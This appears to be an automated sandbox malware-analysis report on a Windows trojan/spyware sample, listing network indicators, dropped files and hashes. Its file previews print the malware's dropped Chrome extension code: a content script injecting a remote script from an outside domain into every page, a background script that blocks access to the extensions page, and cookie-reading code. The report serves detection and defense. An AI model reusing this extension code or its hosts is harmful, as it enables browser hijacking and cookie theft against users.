                                                                                                                                unknown
                                                                                                                                https://1A469593C1FE15DC.xyz/63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://ocsp.thawte.com0MiniThunderPlatform.exe.3.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://store.paycenter.uc.cnmail-attachment.googleusercontent.comMiniThunderPlatform.exe.3.drfalse
                                                                                                                                    high
                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                                                                                                      high
                                                                                                                                      https://twitter.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJecvB803.tmp.11.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown

Contacted IPs

Public

IP: 34.94.64.66
Domain: unknown
Country: United States
ASN: 15169
ASN Name: GOOGLEUS
Malicious: false

Private

IP: 127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 346325
Start date: 30.01.2021
Start time: 14:30:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 36s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: fnhcdXEfus.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.7% (good quality ratio 20.6%)
                                                                                                                                        • Quality average: 80.1%
                                                                                                                                        • Quality standard deviation: 27.4%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                        • Number of executed functions: 0
                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 51.11.168.160, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.104.139.180, 52.155.217.156
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match: 34.94.64.66
Associated Sample Name / URL  Detection  Context
fnhcdXEfus.exe  malicious  • C8DD8AE6DC4DC644.xyz/info_old/ddd

Domains

Match: c8dd8ae6dc4dc644.xyz
Associated Sample Name / URL  Detection  Context
fnhcdXEfus.exe  malicious  • 34.94.64.66

ASN

Match: GOOGLEUS
Associated Sample Name / URL  Detection  Context
fnhcdXEfus.exe  malicious  • 34.94.64.66
KYC FORM01.xlsx  malicious  • 34.102.136.180
MediaPlayer.apk  malicious  • 172.217.20.106
VM859-7757.htm  malicious  • 216.58.208.118
KYC AGREEMENT.xlsx  malicious  • 34.102.136.180
INV.xlsx  malicious  • 34.102.136.180
ki7710921.exe  malicious  • 34.102.136.180
0113 INV_PAK.xlsx  malicious  • 34.102.136.180
chrome.exe  malicious  • 8.8.8.8
YK5tmqQ18z.exe  malicious  • 35.246.6.109
q5oRsfy1vk.exe  malicious  • 34.102.136.180
c8TrAKsz0T.exe  malicious  • 34.102.136.180
Immuni.apk  malicious  • 172.217.20.106
YWrrcqVAno.exe  malicious  • 34.102.136.180
lbqFKoALqe.exe  malicious  • 35.184.90.176
eDpjcIIh9G.exe  malicious  • 34.102.136.180
6tivtkKtQx.exe  malicious  • 34.102.136.180
Sf6jgQc6Ww.exe  malicious  • 34.102.136.180
j64eIR1IEK.exe  malicious  • 34.102.136.180
bEuBS6SwMo.exe  malicious  • 35.228.108.144

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Associated Sample Name / URL  Detection
fnhcdXEfus.exe  malicious

Match: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Associated Sample Name / URL  Detection
fnhcdXEfus.exe  malicious
Cyfj6XGbkd.exe  malicious
N1yprTBBXs.exe  malicious
Cyfj6XGbkd.exe  malicious
N1yprTBBXs.exe  malicious
FileSetup-v17.04.41.exe  malicious
FileSetup-v17.04.41.exe  malicious

Match: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
Associated Sample Name / URL  Detection
6MhmlD8KZh.exe  malicious
fnhcdXEfus.exe  malicious
Cyfj6XGbkd.exe  malicious
N1yprTBBXs.exe  malicious
Cyfj6XGbkd.exe  malicious
N1yprTBBXs.exe  malicious
FileSetup-v17.04.41.exe  malicious
FileSetup-v17.04.41.exe  malicious

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1612045889599
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Cookies1612045902708
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6970840431455908
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious: false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: ASCII text
Category: dropped
Size (bytes): 886
Entropy (8bit): 5.022683940423506
Encrypted: false
SSDEEP: 24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5: FEDACA056D174270824193D664E50A3F
SHA1: 58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256: 8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512: 2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious: false
                                                                                                                                                                        Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                        Entropy (8bit):5.039480985438208
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                                        MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                                        SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                                        SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                                        SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161
                                                                                                                                                                        Entropy (8bit):7.79271055262892
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                                        MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                                        SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                                        SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                                        SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2235
                                                                                                                                                                        Entropy (8bit):7.880518016071819
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                                        MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                                        SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                                        SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                                        SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):93637
                                                                                                                                                                        Entropy (8bit):5.292996107428883
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                                        MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                                        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                                        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                                        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2380
                                                                                                                                                                        Entropy (8bit):5.687293760500434
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                                        MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                                        SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                                        SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                                        SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                        Entropy (8bit):5.048307538221611
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                                        MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                                        SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                                        SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                                        SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):642
                                                                                                                                                                        Entropy (8bit):4.985939227199713
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                                        MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                                        SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                                        SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                                        SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5468
                                                                                                                                                                        Entropy (8bit):5.178424878725887
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:nq6CbKM/XwdV8zsVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVFy4K7
                                                                                                                                                                        MD5:E52AE16D8295111F41CE1017D6BBD717
                                                                                                                                                                        SHA1:13B9B7EB0D9803835987D908F328C5D2A67EFDCD
                                                                                                                                                                        SHA-256:B3F3400CE3E6F70DC2C916F71D3079799D8BCDA3F2321658091720CC0371A630
                                                                                                                                                                        SHA-512:F56A537EF5C61B285EB70847DCF3F1DD36E7BBB1A74419F51332BA99DCBA3992E89E6BCA69E61676668D26A7E2D47CE0FA2DFD19021DEB5451BA5417BB659D55
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34636
                                                                                                                                                                        Entropy (8bit):5.537941123959356
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:gEyODNUckPWmr+VqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnih9e:R5OLlvAnt
                                                                                                                                                                        MD5:A8880AA0B82D2CAA5A706D133ACD3070
                                                                                                                                                                        SHA1:92AC70E91495CCEBB080E1EDB657BFD0E810AC09
                                                                                                                                                                        SHA-256:DC1465579AB0AF761868D09122E283E44FBF2EFF167977C1A1BE71870C9542D0
                                                                                                                                                                        SHA-512:35E15BC84290D122286DE1404345FF9A5A2D55AF6B039B6F624C932B15CE7A3EABD4E5181810223744A0F320225DDF2D266C72916B74FACC6340ADB5FCB16679
                                                                                                                                                                        Malicious:true
